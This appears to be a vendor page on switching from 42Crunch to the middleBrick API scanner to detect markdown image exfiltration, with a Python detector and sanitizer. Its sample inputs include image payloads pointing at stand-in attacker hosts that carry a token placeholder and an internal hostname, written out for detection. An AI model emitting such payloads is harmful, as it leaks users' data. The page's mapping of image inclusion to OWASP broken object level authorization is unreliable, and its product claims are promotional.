Migrating from 42Crunch to middleBrick for Markdown image exfiltration check
What middleBrick covers
- Black-box API scanning without agents or code access
- Detects markdown injection and data exfiltration paths
- LLM adversarial probes across Quick, Standard, and Deep tiers
- OpenAPI 3.0/3.1 and Swagger 2.0 parsing with $ref resolution
- Authenticated scanning with header allowlist controls
- Continuous monitoring and diff detection across scans
How markdown injection can lead to image exfiltration
Markdown is widely accepted as a lightweight formatting syntax, but when user-controlled content is rendered without strict validation, it can become an implicit outbound channel. An attacker can embed image syntax with a remote URL, and if the renderer fetches that image, the request can leak sensitive context including session tokens or internal hostnames. The scanner inspects submission text for image patterns and related protocols to surface this risk before it reaches production renderers.
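To make the inspection described above concrete, the following Python checker is an added example written for this page; it is not middleBrick's own scanner logic. It finds inline, reference-style and raw-HTML image references in submitted text, classifies each URL (local, allowlisted, remote, data URI, dangerous scheme), reports whether rendering the text would cause an outbound fetch to an off-allowlist host, and offers a sanitizer that replaces such references with a visible placeholder. The sample submissions, host names and the `cdn.example.com` allowlist entry are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Inline image: ![alt](url) or ![alt](<url> "title")
MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?[^)]*\)')
# Reference-style image use: ![alt][label]; the label is resolved against a
# definition line "[label]: url" (collapsed/shortcut reference forms are not handled)
MD_IMAGE_REF = re.compile(r'!\[[^\]]*\]\[([^\]]+)\]')
MD_REF_DEF = re.compile(r'^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?([^\s<>]+)>?', re.MULTILINE)
# Raw HTML <img>, which many markdown renderers pass through untouched
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>', re.IGNORECASE)

REMOTE_SCHEMES = {"http", "https", "ftp"}
DANGEROUS_SCHEMES = {"javascript", "vbscript", "file"}
EXFIL_VERDICTS = {"remote", "dangerous"}

# Constructed sample submissions (not taken from the original page).
SAMPLE_SUBMISSIONS = {
    "benign": "Thanks for the update! See [docs](https://docs.example.com/guide).",
    "remote_image": "Nice work ![status](https://attacker.example/pixel.png?t=SESSION_TOKEN_PLACEHOLDER)",
    "html_img": 'Report: <img src="http://203.0.113.9/collect?host=db.internal">',
    "protocol_relative": "![x](//collector.example/x.gif)",
    "reference": "![logo][badge]\n\n[badge]: https://tracker.example/b.png",
    "local_image": "![diagram](/static/diagram.png)",
    "data_uri": "![inline](data:image/svg+xml;base64,AAAA)",
    "allowed": "![ok](https://cdn.example.com/ok.png)",
}


def classify_url(url, allowed_hosts=()):
    """Classify an image URL as local, allowed, remote, data, dangerous or unknown."""
    parsed = urlparse(url.strip())
    scheme = parsed.scheme.lower()
    if scheme in DANGEROUS_SCHEMES:
        return "dangerous"
    if scheme == "data":
        return "data"
    if scheme in REMOTE_SCHEMES or (scheme == "" and url.startswith("//")):
        # .hostname drops userinfo and port, so "https://trusted@evil/" resolves to "evil"
        host = (parsed.hostname or "").lower()
        return "allowed" if host in {h.lower() for h in allowed_hosts} else "remote"
    if scheme == "":
        return "local"
    return "unknown"


def _finding(kind, url, match, allowed_hosts):
    return {"kind": kind, "url": url, "span": match.span(),
            "verdict": classify_url(url, allowed_hosts)}


def find_image_references(text, allowed_hosts=()):
    """Return every image reference in `text`, in document order, with a verdict."""
    refs = {label.lower(): url for label, url in MD_REF_DEF.findall(text)}
    findings = [_finding("markdown-inline", m.group(1), m, allowed_hosts)
                for m in MD_IMAGE.finditer(text)]
    for m in MD_IMAGE_REF.finditer(text):
        url = refs.get(m.group(1).lower())
        if url is not None:
            findings.append(_finding("markdown-reference", url, m, allowed_hosts))
    findings += [_finding("html-img", m.group(1), m, allowed_hosts)
                 for m in HTML_IMG.finditer(text)]
    return sorted(findings, key=lambda f: f["span"][0])


def has_exfil_risk(text, allowed_hosts=()):
    """True if `text` carries an image reference to an off-allowlist remote or dangerous URL."""
    return any(f["verdict"] in EXFIL_VERDICTS
               for f in find_image_references(text, allowed_hosts))


def sanitize(text, allowed_hosts=()):
    """Replace every image reference that is not local or allowlisted with a placeholder.
    Data URIs are removed too: they do not exfiltrate, but SVG payloads can carry script."""
    out = text
    for f in sorted(find_image_references(text, allowed_hosts),
                    key=lambda f: f["span"][0], reverse=True):
        if f["verdict"] in ("local", "allowed"):
            continue
        start, end = f["span"]
        out = out[:start] + "[image removed]" + out[end:]  # right-to-left keeps spans valid
    return out


if __name__ == "__main__":
    allow = ("cdn.example.com",)
    for name, body in SAMPLE_SUBMISSIONS.items():
        verdicts = [f["verdict"] for f in find_image_references(body, allow)]
        print(f"{name:18} risk={has_exfil_risk(body, allow)!s:5} {verdicts}")
```

The allowlist is matched on the parsed hostname rather than on a string prefix, which is why a URL carrying a trusted name in its userinfo part (`https://trusted.example@attacker.example/`) is still classified as remote. Running the checker at submission time, before content reaches a renderer, is the point at which a remote-image finding is cheapest to act on.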
What migrating from 42Crunch improves for image exfiltration detection
42Crunch provides protection within its managed gateway, yet coverage is limited to requests that pass through its infrastructure. middleBrick operates as a black-box scanner that evaluates the live API surface independently of the runtime stack, detecting markdown injection vectors that bypass gateway rules. Because scanning is read-only and does not require code access, it fits into any language or cloud environment without deploying sensors or agents.
Key improvements include broader input validation coverage, detection of dangerous HTTP methods and wildcard CORS that facilitate outbound data paths, and LLM adversarial probes specifically designed to test prompt handling and data exfiltration paths. The scanner correlates findings across authentication misconfigurations and property over-exposure to map how markdown payloads might exploit trust boundaries.
Migration workflow: submitting endpoints and reviewing findings
To evaluate your API for markdown image exfiltration risk, submit a reachable endpoint URL through the dashboard or CLI. The scan completes in under a minute using read-only methods such as GET and HEAD, plus text-only POST requests for LLM probes. You receive a risk score from A to F and prioritized findings that highlight where markdown parsing may expose internal data.
Example CLI usage:
middlebrick scan https://api.example.com/openapi.json
Authenticated scanning, when enabled with Bearer or API key credentials, allows deeper path coverage while respecting a strict header allowlist. Domain verification ensures that only the domain owner can run authenticated scans, preserving signal relevance.
Mapping findings to compliance and detection context
Findings are mapped to OWASP API Top 10 (2023), SOC 2 Type II controls, and PCI-DSS 4.0 validation points. For example, unchecked markdown rendering that permits remote image inclusion aligns with OWASP API01:2023 Broken Object Level Authorization and supports audit evidence for SOC 2 monitoring requirements. The scanner does not claim compliance, but the output helps you prepare evidence for review and refine existing controls.
Detection categories relevant to image exfiltration include Input Validation, Data Exposure, and LLM / AI Security probes that test system prompt extraction and indirect prompt injection. This layered approach highlights how markdown inputs can interact with broader API weaknesses.
Operational considerations and limitations
middleBrick identifies indicators and provides remediation guidance, but it does not patch, block, or fix runtime behavior. Destructive payloads are never sent; private IPs, localhost, and cloud metadata endpoints are blocked at multiple layers. Customer data is deletable on demand and is never used for model training.
Limitations specific to image exfiltration include no active SQL injection or command injection testing, no blind SSRF detection without out-of-band infrastructure, and no replacement for a human pentester when business logic context is required. Continuous monitoring can schedule regular rescans and diff findings across runs, but ongoing tuning is necessary to reduce false positives and keep signal high.